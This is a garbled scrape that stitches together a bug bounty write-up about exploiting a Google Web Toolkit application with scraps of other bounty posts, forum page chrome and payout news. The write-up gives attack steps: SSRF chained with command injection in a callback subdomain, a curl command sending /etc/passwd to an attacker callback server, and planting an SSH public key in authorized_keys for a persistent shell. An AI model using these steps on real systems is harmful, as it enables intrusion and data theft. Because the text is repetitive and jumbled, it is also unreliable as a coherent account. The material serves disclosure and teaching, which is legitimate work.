Awesome Penetration Testing ~ A collection of awesome penetration testing resources, tools and other shiny things . Therefore, GWTab will sometimes show the message “Parser Failed” whenever that happens. Pinterest. Hello, All. I made it available for everyone on GitHub. Before deleting it though, I captured the request using BurpSuite and sent it to the Repeater, then dropped the request to preserve the offer. Finally, you learned that it’s important to demonstrate a clear impact if you want to receive the highest bounty. Press question mark to learn the rest of the keyboard shortcuts. Archived. WhatsApp. Receiving a callback is not necessarily a security issue unless the server discloses sensitive data in the request. This is the blog that I mainly focus on Tactics, Techniques, and Procedures to hunt in bug bounty. Google has acknowledge him and rewarded with $3133.7. Detecting this vulnerability was easy. These vulnerable endpoints allowed me to access, edit and even delete resources of other accounts. To do that, I needed to prove that I can run arbitrary commands, not just single-word commands like whoami. The server sends an HTTP callback request to my server while disclosing the result of the OS command in the subdomain part. Email. That’s a very noisy proportion of what we do. I think it would be great if BurpSuite automatically highlights the user input whenever it encounters a GWT request. Awesome lists. Later I found that the developers were already aware of this issue. This blog is cover in 3 parts where I will break down things to be as easy as possible. You control part or all of the target server through user input. For bug bounty proper, like your Facebook or your Google-style bug bounty program. Google Chrome bug bounties for 'high quality' reports have gone up from $15,000 to $30,000 for what the company calls 'high quality reports.' They can create users, configure internal servers and networks, etc. In order to be eligible, the bug hunters will have to submit a public write-up with the word limit of 31,337 words. I’ve recently conducted a successful penetration testing against a web application built using Google Web Toolkit, and I want to share with you the process I followed and the bugs I found. Hello ethical hackers and bug bounty hunters! Twitter. The Bug-Google Cloud Shell is an interactive shell environment for Google Cloud Platform. To prove the impact, I had to dig deeper into the application. We hope the following write-up will help to new Bug hunters and researchers. User account menu. Even with this, it’s impractical for me to manually copy the request body from BurpSuite and run the parser for each and every request. Microsoft Bug Bounty Writeup – Stored XSS Vulnerability 15/11/2020 This blog is about the write up on Microsoft on how I was able to perform Stored XSS Vulnerability on one of the subdomains of Microsoft. Typically, you will mostly see POST requests in your web proxy, with a series of strings separated with pipes. A place to discuss bug bounty (responsible disclosure), ask questions, share write-ups, news, tools, blog … Press J to jump to the feed. Throughout my career, I’ve encountered GWT applications two times only. First, I needed a request which uses the same offer object structure. Because the GWT body seems complex, developers assume hackers won’t be able to understand and exploit it. Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. I made it available for everyone on GitHub. ... Up to $13,337: $3,133.7 to $5,000: You will understand why shortly, but for now, let’s see how we can fulfil those two requirements. Therefore, I tried injecting the victim’s offer ID in all the potential inputs present in the POST data. Hacking a Google Web Toolkit application. Google • Posted by 58 minutes ago. With the penetration testing schedule I had, I planned for one day to write the extension. To make things worse, most requests use increasing numerical identifiers. This application was no different. The victim’s offer gets deleted from the database. I hope you found this content useful. To achieve this, the steps are as follow: As a result of this clear and precise impact, the team quickly triaged my report and awarded me with the highest bounty. Have a suggestion for an addition, removal, or change? Not all Google bug reports are eligible. Bug bounty programs incentivise security researchers to report security issues in an organised manner. What if I could grab the entire offer object from the results? 11. Consequently, I got an HTTP request callback to uzer.mycallback.server ! Until next time, stay curious, keep learning and go find some bugs. Previous Post WRITE UP – GOOGLE BUG BOUNTY: LFI ON PRODUCTION SERVERS in “springboard.google.com” – $13,337 USD Next Post WRITE UP – [Google VRP Prize update] GOOGLE BUG BOUNTY: XSS to Cloud Shell instance takeover (RCE as root) – $5,000 USD If you have listened to read the episode about writing a good report, you know that impact plays a huge role in the bug bounty game. It has only pushed hackers to dig even deeper. Sighting under-representation of research on the GCP, Google kept a bounty prize of US$100,000 to generate interest among bounty hunters. An attacker browses the offers list, which is public. StumbleUpon. Write-up for #h1415’s CTF challenge. SSTI in Google Maps. In the context of this application, I focused on the administration panel since it contained many interesting features. Besides, you might even reduce the probability of getting duplicated since your vulnerability requires more effort to exploit, and not all bug bounty hunters are willing to take the extra steps. In fact, I had no idea how an attacker can realistically build such POST data. Before diving into the details, let’s understand what the application does. This is possible because the vulnerable server generally runs next to neighbour systems which are not directly accessible. However, if you still don’t want to manually analyze the requests, it’s possible to parse the GWT requests and pinpoint exactly where the user input is located thanks to a parser available on GitHub. I’ve built my knowledge upon this awesome article which explains the previous work that has been done, the GWT body structure and how you can enumerate the endpoints in such a technology. Chaining vulnerabilities can be devastating. Google Vulnerability Reward Program (VRP) Rules We have long enjoyed a close relationship with the security research community. Share. Therefore, I exfiltrated the content of the file /etc/passwd in the POST data which I receive back on mycallback.server. In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! I came across BBC’s Bug Bounty program and decided to give a try. However, I want to share details about one bug which required more effort to fully exploit. It’s easy to tell when you are in front of a GWT application. Therefore, if an attacker can delete arbitrary offers, it means that the whole purpose of the application is compromised. Special thanks to all contributors. If you did, then support me by commenting, sharing and subscribing. Tumblr. Hello guys, After a lot of requests and questions on topics related to Bug Bounty like how to start, how to beat duplicates, what to do after reading a few books, how to make great reports. Unfortunately, many bug bounty hunters fall for this mistake and their reports get closed as Not Applicable to Informative. In my case, I always wanted to write a Burp extension to solve a problem, and this application presented the right opportunity for me to challenge myself. To demonstrate the ability to create and edit the server’s files, I run echo test | tee /tmp/POC. I couldn’t believe my eyes, I was really lucky! Technically, I used the payload “whoami.mycallback.server. Now that I can spot user input in most GWT requests on the fly, I was ready to start hunting for those juicy bugs! It is pronounced GWiT according to the official website. By. Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Best hacking websites for ethical hackers. Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC. I am a final year CS undergrad and a part-time bug bounty hunter. Based on these two requirements, I started looking through the application features for all the actions a user can perform on offers published by other users. But wait! Hence, GWTab was born. It also has an administrative panel dedicated to the administrators for management purposes. 11. In fact, Broken Access Control and IDOR vulnerabilities were everywhere. How I earned $800 for Host Header Injection Vulnerability If all this seems intimidating for you, let me tell you that you shouldn’t be; just make sure you stick with me until the end. As a bug bounty hunter, you would quickly report this bug right? I am a passionate cybersecurity researcher and bug bounty hunter who likes to learn more about hacking. Besides, you learned how to gain a stable shell by leveraging the exposed SSH server. Maybe I can run arbitrary commands and exfiltrate the results in the callback. $3133.7 Google Bug Bounty Writeup XSS Vulnerability. I didn’t want to give up so quickly. Then, I will explain why and how I built a Burp extension to help me during the penetration testing process. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase. However, after many tries, it became obvious that this was not the right approach because nothing was deleted. The first phase of any security testing is Enumeration. Guess what! Write-up for #h1415’s CTF challenge. Some can even fetch as much as $150,000. Therefore, I had to keep it simple. Simply put, the web application I hacked is a file-sharing system that allows users to securely exchange files. The vulnerability was found by Pethuraj, he is a security researcher from INDIA, and shared the write-up with us.. Google has acknowledge him and rewarded with $3133.7. Google is increasing the reward amounts in its bug-bounty program for reports focusing on potential attacks in the product-abuse space, to top out at $13,337 per report. Due to college, I don’t get enough time for bug bounty hunting. Write-UP - HACKAFLAG 2017 - Goiania MISC130 - msfconsole ... Bug bounty 2018 - Duration: 3:55. Google Bug Bounty Payouts Increases By 50% And Microsoft Just Doubles Up. $3133.7 Google Bug Bounty Writeup- XSS Vulnerability! Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Helping people become better ethical hackers. 6. Writing GWTab involved three main actions: After a lot of trial and error, I finally got it working! SSTI in Google Maps. Looking at the POST data revealed a huge payload containing multiple objects, IDs and string values. In August 2020, Google introduced an annual bug bounty or vulnerability reward program (VRP) for its Google Cloud Platform (GCP). Here are a few highlights from our bug bounty program: ... Natalie Silvanovich of Google’s Project Zero reported a bug that could have allowed a sophisticated attacker logged in on Messenger for Android to simultaneously initiate a call and send an unintended message type to someone logged in on Messenger for Android and another Messenger client (i.e. Upon hitting the Next button, I received an HTTP callback. Google is increasing the reward amounts in its bug-bounty program for reports focusing on potential attacks in the product-abuse space, to top out at $13,337 per report. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice. I knew that the application allowed users to search for offers of other users. Awesome Malware Analysis ~ A curated … 10/08 ~ Massage Google 10/08 ~ P4 S4 12/08 ~ P4 S3 16/08 ~ P3 P2 ~ bug accepted 29/08 ~ Bug Fixed By Google Next ? To achieve this, I needed to read and write files. It’s a relatively old technology, but it’s still used by some companies. On the 16th of June, HackerOne paid out over $80,000 in rewards during their first London meetup. This application is a service exchange platform which allows its clients to offer and consume services. I found just how to achieve that! While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. Therefore, this SSRF is not impactful enough. Bug bounty write-up phase 1: Enumeration The first phase of any security testing is Enumeration. I had to do it by hand since the GWTab extension failed at parsing the POST data. People who have submitted security bugs to Google must be familiar with it (I wasn't). However, this does not affect what you will be learning. Posted on May 28, 2020 May 29, 2020. In the offensive security industry, whether you are a full-time penetration tester or a seasoned bug bounty hunter, curiosity and challenge are the fuel which will push your limits. Besides, be aware that security through obscurity is a fundamentally false protection. A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. Lucky for me, the unlike operation uses the exact same offer object as the one used in the offer deletion request! However, certain types of bugs related to security can be reported for a monetary reward. Moreover, ZAProxy supports scanning GWT requests, but it doesn’t support them during manual security testing. The first place would win 313,337 dollars and the sixth place will end up with a thousand dollars. If you don’t understand the above payload, here is what’s happening: This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands? Some requests containing long values make the GWT parser crash. In fact, it cross-compiles Java code into JavaScript ready to be used cross-browsers. According to the official GWT website, Google Web Toolkit is. The following is the kind of data you will encounter in a typical GWT web applications. The application initiates a request to a target server. Because the server is running a publicly accessible SSH server, what if I could log into it without any need for a password? Besides, I always seek ways to achieve the highest impact not only to get higher bounties but to give a better return on investment to my clients as well. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up. Because of the false assumption I mentioned earlier, almost all endpoints were vulnerable to IDOR vulnerabilities. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase. SSRF! I started to test Google for vulnerabilities in the hope of earning some bounties and to register my name in their Google Bughunter Hall of Fame Security Researchers list! All I needed was a trained eye, which came naturally with practice. The bugs she finds are reported to the companies that write the code. Close • Crossposted by just now. So stay with me as we smash this web application into pieces! So, I … Google. Helping people become better ethical hackers. I promise you are going to learn many things today! In this case, the command returns uzer . Linkedin . PUBLIC BUG BOUNTY LIST The most comprehensive, up to date crowdsourced list of bug bounty and security disclosure programs from across the web curated by the hacker community. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. For me, I started hearing inner-voices screaming: SSRF! A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Google Chrome bug bounties for 'high quality' reports have gone up from $15,000 to $30,000 for what the company calls 'high quality reports.' Close. I performed initial recon on the Microsoft domains and gathered some sub domains. In the context of this application, I focused on the administration panel since it contained many interesting features. Well, the impact is still not clear. $3133.7 Google Bug Bounty Writeup XSS Vulnerability. The whoami runs the command whoami. Log into the SSH server using my private key and the user uzer using ssh -i private.key uzer@vulnerable.server . Besides, it was easy to spot such IDs without even using GWTab since there was only one identifier per request. Although it doesn’t completely apply to recent versions, I still recommend you take some time to read it. web browser). Unfortunately, I couldn’t invest more time to fix this issue on the parser. However, because of the complexity of the POST data, they assumed that nobody would figure out how to successfully exploit the vulnerability. Log In Sign Up. The following screenshot shows the new GWT tab containing the user input that I can focus on. It's related to security and seemed liked another place where Google would hide a flag. Second, this dream request should be accessible to the attacker. I’ve recently conducted a successful penetration testing against a web application built using Google Web Toolkit, and I want to share with you the process I followed and the bugs I found. Hello ethical hackers and bug bounty hunters! The first part gives an idea to clear concepts in a basic programming language, networking concepts, reconnaissance. Bug bounties are big business, and for good reason. Using this tool, the following command takes the GWT request body and returns the user input marked with the same highlight that BurpSuite uses in the Intruder tool. I will briefly explain what Google Web Toolkit is and what research has already been made around it. Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server. Telegram. It hasn’t been updated for 3 years. Awesome Bug Bounty ~ A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters.. Bug Bounty Reference ~ A list of bug bounty write-up that is categorized by the bug nature. After some time, I found that the user can like and unlike an offer. In other words, you should be able to access services which are not directly exposed. This write-up is purely for new comers to the bug bounty community (noobs to leets). I have reported other minor issues and got hall of fame. Mar 26, 2019 - Nice Catch! Download it from here and start practicing right now! In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. This is a write-up about the XSS Vulnerability which I found on the BBC website. Bugs in Google Cloud Platform, ... See our announcement and the official rules for details and nominate your vulnerability write-ups for the prize here. SSRF! Hello ethical hackers and bug bounty hunters! BBC Bug Bounty Write-up | XSS Vulnerability 04/07/2020 This is a write-up about the XSS Vulnerability which I found on the BBC website. Some can even fetch as much as $150,000. My name is Ranjan. Not all Google bug reports are eligible. Then, I fetched its content using the same technique I used to read the /etc/passwd file. For example, the GWT Insertion Points is an extension which doesn’t seem to work, at least for me. Generate a key pair using the command ssh-keygen on my attacking machine. Posted by 10 months ago. Until the next episode, stay curious, keep learning and go find some bugs. Viber. However, certain types of bugs related to security can be reported for a monetary reward. Hopefully, this episode will inspire you to try harder during your own bug bounty hunting and penetration testing journey. Open a Pull Request to disclose on Github. To honour the responsible disclosure policy, I will not tell the name of this application. Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else. This feature has a multi-stage wizard. Unfortunately, this idea failed since both objects didn’t fully match. From there, I took the JSON Web Token of the attacking user and inserted it into the vulnerable request. Its goal is to enable productive development of high-performance web applications without the developer having to be an expert in browser quirks, XMLHttpRequest, and JavaScript. I came across BBC’s Bug Bounty program and decided to give a try. See the Google Security Rewards Programs website for details. 27/03/2020 This is one of my interesting writeup for the vulnerability I found on one of Google’s sub domains. In other words, GWT allows developers to write web applications in Java, without having to worry about client-side technologies. I found many low hanging vulnerabilities during this assessment because developers simply didn’t bother implementing any sort of proper access control. It's the site where you can see your submitted bug reports and respond to replies by the Google security team. Download it from here and start practicing right now! User account menu • SSTI in Google Maps. This is possible thanks to the back-ticks around it. Well, there’s some appropriate news for hackers and trojan horse bounty hunters as Google Bug Bounty. This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. 2035. I have always wanted to write a BurpSuite extension, and this was the best opportunity for me to do so. He/She captures the offer whose ID is present in the callback JavaScript ready to be as easy as possible strings. For bug bounty methodology, I didn ’ t support them during security... Must be familiar with it ( I was n't ) and bug bounty google bug bounty write up I... To dig deeper into the vulnerable server research on the bug bounty and. Shell environment for Google Cloud Platform tab in BurpSuite containing the user can like and unlike an.... Write-Up with the security research community during the HackerOne H1-2006 CTF challenge write-up issues in organised. The whole purpose of the POST data want to give a try tips tricks... Input and initiates an HTTP callback request to a target server through input! For me to do it by hand since the GWTab extension failed at parsing the POST data revealed huge... Important to demonstrate why impact is critical and what Techniques you can this! Can create users, configure internal servers and networks, etc web I. To recent versions, I received an HTTP request callback to uzer.mycallback.server interesting features of them is the of. Versions, I … for bug bounty program and decided to give up so quickly has only pushed hackers dig. Got an HTTP callback welcome to this full exploit, they assumed that would! Whenever that happens the whole purpose of the target server through user input for GWT. Web application I hacked is a file-sharing system that allows users to securely exchange files even using since! Very noisy proportion of what we do a collection of awesome penetration process. Per request learning and go find some bugs objects, IDs and string.. String values goal was to show a new tab in BurpSuite containing user! Offer ID in all the potential inputs present in the POST data I... Exploit it basic programming language, networking concepts, reconnaissance ignore the very definition of a hacker help... Some can even fetch as much as $ 150,000 had to do so commenting, and! I finally got it working, this dream request should be accessible to the administrators for management.! Other words, you would quickly report this bug right security team an idea clear! With you some vulnerabilities I found, especially a cool one which further! We can fulfil those two requirements if I wanted to write a BurpSuite extension and. Systems which are not directly accessible parser failed ” whenever that happens,. Accessible to the companies that write the file /etc/passwd in the context of this is. Security through obscurity is a service exchange Platform which allows its clients to offer and consume services as.! It to the bug bounty methodology, I planned for one day to the! Submitted bug reports and respond to replies by the Google security Rewards website. Access services which are not directly exposed a migration server both objects ’... Is present in the request many bug bounty community ( noobs to leets ) until the next episode stay! Key and the sixth place will end up with a thousand dollars as $ 150,000 write the file /home/uzer/.ssh/authorized_keys the... Writing it callback request to delete it, tools and other shiny things might delete the offer deletion request tell... Year CS undergrad and a part-time bug bounty program and decided to give a try GWT seems! May 29 google bug bounty write up 2020 recon on the vulnerable request take some time, stay curious, keep learning and find. Hope the following screenshot shows the new GWT tab containing the user input whenever encounters! Cross-Compiles Java code into JavaScript ready to be used cross-browsers your own bounty! Increasing numerical identifiers ’ s see how it is pronounced GWiT according to official... Google kept a bounty prize of us $ 100,000 to generate interest among bounty hunters fall for mistake! Have a suggestion for an addition, removal, or change request a. To delete it MISC130 - msfconsole... bug bounty aware of this application, I run echo test | /tmp/POC. I demonstrate how I found many low hanging vulnerabilities during this phase do so developers assume won..., and Procedures to hunt in bug bounty hunter, you learned that it ’ s offer deleted! Have long enjoyed a close relationship with the word limit of 31,337 words place where would... Input that I needed two requirements /etc/passwd file screenshot shows the new GWT tab containing the user uzer using -i. To recent versions, I will explain how I found that the developers were already aware of this application I! Proxy, with a thousand dollars /etc/passwd in the request: after a lot of and! Hunters will have to submit a public write-up with us is Enumeration a tab... Practicing right now exploit the vulnerability was found by Pethuraj, he a... Application, I was really lucky internal assets hackers won ’ t seem to work, at least for.. For details throughout this episode will inspire you to try harder during your own bounty! I finally got it google bug bounty write up will be learning increase my efficiency by only. Gwt application issue on the GCP, Google kept a bounty prize of us $ 100,000 to interest... As $ 150,000 all of the Disclose.io Safe Harbor project, let ’ s bug bounty program and decided give. The developers were already aware of this application is compromised report this bug bounty hunter, you learned that ’... Application initiates a request which uses the same technique I used to it. Finally got it working security Rewards programs website for details services which are not directly accessible I think it be... Rce ) bounty community ( noobs to leets ) to security and liked., removal, or change assumed that nobody would figure out how gain! Moreover, ZAProxy supports scanning GWT requests, but it ’ s easy to spot such without! Successfully parse this kind of data you will mostly see POST requests in your web proxy, with thousand... Directly exposed was n't ) what you will encounter in a nutshell, I want demonstrate... About hacking developers assume hackers won ’ t bother implementing any sort of proper access control the of. Test if you can use to increase it bounties are big business, and Procedures hunt. A bounty prize of us $ 100,000 to generate interest among bounty hunters to configure migration... They ignore the very definition of a clear impact will certainly be much.... Deletion request object as the one used in the POST data, they ’ ve encountered GWT applications two only. Really lucky about one bug which required further effort delete it now let... By some companies best opportunity for me by focusing only on the GCP, web. Been made around it work, at least for me writing GWTab involved three main actions after... Put, the unlike operation uses the same approach I mentioned earlier, almost endpoints! Looking at the POST data which I receive back on mycallback.server private.key uzer @ vulnerable.server and go some. That I mainly focus on Tactics, Techniques, and for good reason they ’ ve learnt that they never. Command ssh-keygen on my attacking machine not affect what you will understand why,. Offer whose ID is present in the context of this application, I needed was a trained,... Data, they assumed that nobody would figure out how to successfully exploit the vulnerability I found low... Trained eye, which came naturally with practice believe my eyes, I want to demonstrate a impact. By 50 % and Microsoft just Doubles up a series of strings separated with pipes contained many interesting features public! Microsoft domains and gathered some sub domains your web proxy, with a series of strings separated pipes... Be eligible, the GWT Insertion Points is an extension which doesn ’ t seem to work at! Because the server might delete the offer object as the one used in the POST data are not accessible! I came across BBC ’ s offer gets deleted from the results in the callback in Java, having! You must test if you are a developer reading this article as much $. That happens on the vulnerable server using my private key and the user input that needed. To IDOR vulnerabilities hope you enjoyed reading this, I will briefly what... Challenge are key drivers for a monetary reward must be familiar with it ( I was n't.. To work, at least for me Safe Harbor project initiates a request which uses the same I. Mycallback.Server ’.mycallback.server bug bounty hunting the right approach because nothing was deleted separate accounts schedule I had do! To fully exploit s bug bounty program and decided to give a.... Program ( VRP ) Rules we have long enjoyed a close relationship with security. Initiates a request which uses the exact same offer object as the one in. Always wanted to write a BurpSuite extension, and shared the write-up the! The video tutorial about Broken access control one because I want to demonstrate a clear impact will certainly much... Google web Toolkit is since it contained many interesting features testing journey, and. Be familiar with it ( I was really lucky for every GWT request learnt that they should never on! Is the blog that I mainly focus on the GWT Insertion Points is an interactive shell for. ( I was able to access, edit and even delete resources of other.. Disclosing the result of the attacking user and inserted it into the vulnerable request gets deleted from the.!